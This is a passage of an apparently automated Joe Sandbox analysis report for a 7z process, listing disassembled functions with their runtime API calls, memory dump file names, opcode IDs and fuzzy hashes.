                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1415420288-0
                                                                                                                                                                                                                                                  • Opcode ID: 96e44e9e5a32ed725eb072e1cfbeb8874b8d10a423f6c5ce45c1c81385b624aa
                                                                                                                                                                                                                                                  • Instruction ID: d2f677fd6b7d669b651b77f854037764ec8d296c06247196e9c4cce1af70138d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96e44e9e5a32ed725eb072e1cfbeb8874b8d10a423f6c5ce45c1c81385b624aa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE3192672196C1AACA71EF18E5943EEB760F3D2340F408422D79D43B69EF38D659CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 009A4065
                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 009A4087
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: free.MSVCRT ref: 00973431
                                                                                                                                                                                                                                                    • Part of subcall function 00973404: memmove.MSVCRT ref: 0097344C
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$ExceptionThrowfreemalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1415420288-0
                                                                                                                                                                                                                                                  • Opcode ID: 17819045fa4f71224e77d6b47d31bebb38c9a9f9600a532a75b3572cd8e30e53
                                                                                                                                                                                                                                                  • Instruction ID: 79deaabdafe5ae6dc345b334b3ffbe3ada750178bab2eb1cab8e5c23404dc33d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17819045fa4f71224e77d6b47d31bebb38c9a9f9600a532a75b3572cd8e30e53
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 421190A32196C592CE31EB15F4953EEA311E7D2390F8084269B9D47AA5EB7CC689CB00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1294909896-0
                                                                                                                                                                                                                                                  • Opcode ID: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                                  • Instruction ID: 214c359f7e27b2f733f077cab083f6c2bc8325867af9ea1bdf1376eb75ff1982
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e7d5ba1defadd3acd0d91b79684e099e0fccd2f3b59dc636ae55ac404bf7f5e6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF08123302A9086DE20AB2EE84026D6714FB86FB1F588324DF7D17B91CF24C847C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: malloc.MSVCRT ref: 00972134
                                                                                                                                                                                                                                                    • Part of subcall function 00972130: _CxxThrowException.MSVCRT ref: 0097214F
                                                                                                                                                                                                                                                  • memmove.MSVCRT ref: 009BC815
                                                                                                                                                                                                                                                  • free.MSVCRT ref: 009BC81D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrowfreemallocmemmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1097815484-0
                                                                                                                                                                                                                                                  • Opcode ID: 81a948d7c8275a5e02843b536d61aee36f4bb894a1cd073c72687d460436fb1b
                                                                                                                                                                                                                                                  • Instruction ID: be6baad624b447047fd55c48dbc70692e51eca11ed04a10c23c825dd6af469f1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81a948d7c8275a5e02843b536d61aee36f4bb894a1cd073c72687d460436fb1b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9401A477702588CBCB14DF26D4615ACB764E788FA9B08C129DF094B358DE34DC86CBA0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 009B0A42
                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 009B0A73
                                                                                                                                                                                                                                                    • Part of subcall function 009BB480: GetTickCount.KERNEL32 ref: 009BB49E
                                                                                                                                                                                                                                                    • Part of subcall function 009BB480: strcmp.MSVCRT ref: 009BB4E3
                                                                                                                                                                                                                                                    • Part of subcall function 009BB480: wcscmp.MSVCRT ref: 009BB502
                                                                                                                                                                                                                                                    • Part of subcall function 009BB480: strcmp.MSVCRT ref: 009BB568
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalSectionstrcmp$CountEnterLeaveTickwcscmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3267814326-0
                                                                                                                                                                                                                                                  • Opcode ID: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                                  • Instruction ID: 5fcc57a4dd6f52a124ef3a7b58a44de8285ee106ea5c45a139cfdfeb2f7cb0bc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e88f57d7c7d95c69104a252a1c7d9368823166ee09aea818bbba8cc4799af9b9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8CF05EA2264A5082E7209B24ED447997360E744BB5F144735DEBD476E5CF38858AC314
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: free$memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1534225298-0
                                                                                                                                                                                                                                                  • Opcode ID: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                                  • Instruction ID: 554f980734f03c0d39a60298e0653c5690db0cd4c4c080704dc273480d840ae7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 586c8cc20f275266bf889dc5ef0a5fac6cb60cf56a6a0da5214c7ba1b0ee869b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61E0656326864091CE30EB21E45115EA720FBC67F4B84A311F6BF577F9DE28C686CB10
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionThrowmalloc
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2436765578-0
                                                                                                                                                                                                                                                  • Opcode ID: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                                  • Instruction ID: cd4c51822260e3001ac616b7d8a1b2f4ceedf246fee2a91b9498f84004d92fef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa6ff63fb0a4f718842d089b3478a2da5176663da7f3a9e4140987a861a74cca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32D01251B2B784D1DE04A765A8913546760A7A87A0FD05056F24E01726DA5CC19F8701
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                                  • Instruction ID: a51ac702f48b7950af64d3ff8bbabac7dd0cb32c6707f116fe232e01ae19a586
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cd451c15515d27b5fb79faae5e116a06c4e7ed636842f570073d620974bbfb5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D5148B2248AC096CB62DF35D4402ED3B65F389F98FA94136DE9A4B719EF35C885C710
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteString
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4236320881-0
                                                                                                                                                                                                                                                  • Opcode ID: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                                  • Instruction ID: 0a1f97012e276e21f4fc005c8b8745c08ae671e604015aa4cb95adc1c44089e6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f64ae9d3ddb337fcfe08435523e691609cde8a8f740f1935bab7fcecbb63b66
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6911E51620878182EB208B5CE44036B63A4E7857E4F648324EFDA977E4EF3CCD85C705
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00978A60: SetFilePointer.KERNELBASE(?,?,00000003,?,00978E1D), ref: 00978A99
                                                                                                                                                                                                                                                    • Part of subcall function 00978A60: GetLastError.KERNEL32(?,?,00000003,?,00978E1D), ref: 00978AA6
                                                                                                                                                                                                                                                  • SetEndOfFile.KERNELBASE ref: 00978CC7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$ErrorLastPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 841452515-0
                                                                                                                                                                                                                                                  • Opcode ID: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                                  • Instruction ID: 42ed7d3445f28a1ed28829aa0a36b1de84be7ad676284c6db89679680406daa0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c90e265412cd84312492c39e5ed9ff3a683aba44eb41e009ab2a5a4b09f96c43
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BAE02613341894D2E7219BA5A98966B8318BB447E0F4CC031AA8D43B488E698CDA8720
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00976464: FreeLibrary.KERNELBASE(?,?,?,009764E7), ref: 00976475
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNELBASE ref: 009764F4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$FreeLoad
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 534179979-0
                                                                                                                                                                                                                                                  • Opcode ID: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                                  • Instruction ID: a231ddf5fa6551f86964f586a55fcfb556b175bf4124508176517dd8c27f828f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a2e34574c688ca7af7f74dd229b4749d7d1e3364c56f11fc75fdd86188f9568
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93D02E12700A2082EE102BBABA813A803182F06BE0E88C430EE0D03321DE280CEBA300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                                                                                                                  • Opcode ID: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                                  • Instruction ID: 5e6a3ed31fe405f98c6bdd920360712a321372d34f0ef9ee39c533b3599f0b8f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1085791dad4498b16cc9abdee153caba491eab099019c6398aedde3617614eaf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56E0467A228640CBEB40CF64E400B4AB3A0F388B24F004115DE8A83B54CBBCC044CF40
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?,?,009764E7), ref: 00976475
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                                                                                                  • Opcode ID: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                                  • Instruction ID: 0af3b99ee2105b22478fc079c2f723d730331cc37fb24f89ba7607f387790fd4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 263427ff8568d61754d606e09aee6c08ed44ac838dad2c881132b4691fd57d34
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDD012A3702905C5FF154FA6EC6433533586B58F94F5C9010CE194A251EB2988958764
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileRead
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                                                                                                                  • Opcode ID: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                                  • Instruction ID: f5d8e23be3da4e2797f14a4cbd5e7c534c9a43b3836a91d7eba4365a47ae0c90
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6e337c251ae6e5d4ca8af2bcbb66e5cb8e311ff68b77760b7eea80f1dd1c151
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1D05E76618684C7E7008F70E45575AF764F388B64F480004EE8807774CBBCC199CF00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: fputs
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1795875747-0
                                                                                                                                                                                                                                                  • Opcode ID: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                                  • Instruction ID: 4dde336b20b3cf0fc75543e42feb30cf60b5172ec2907a6a3cf899afec77e140
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f6c79e67240f10e506dcd010c05e3fcb41f145b375b3b6d5ae371637dca3dc7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1D0A9D2710B0882CE109B2AE8143692321BB88BC8F088021DE9E0B318EA2CC2098B00
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000014.00000002.2963262384.0000000000971000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00970000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963232006.0000000000970000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963317239.00000000009BF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963353424.00000000009DC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000014.00000002.2963388939.00000000009DF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_20_2_970000_7z.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                                                                                                  • Opcode ID: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
                                                                                                                                                                                                                                                  • Instruction ID: 5a158c72c3d0313823bd25a5dd729eadf1641422a96238ee056b61aa98edc1f0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 722c96f04a6826338d67a42852ca525e19c432cc1267ed16e2c090f8721fb2dc
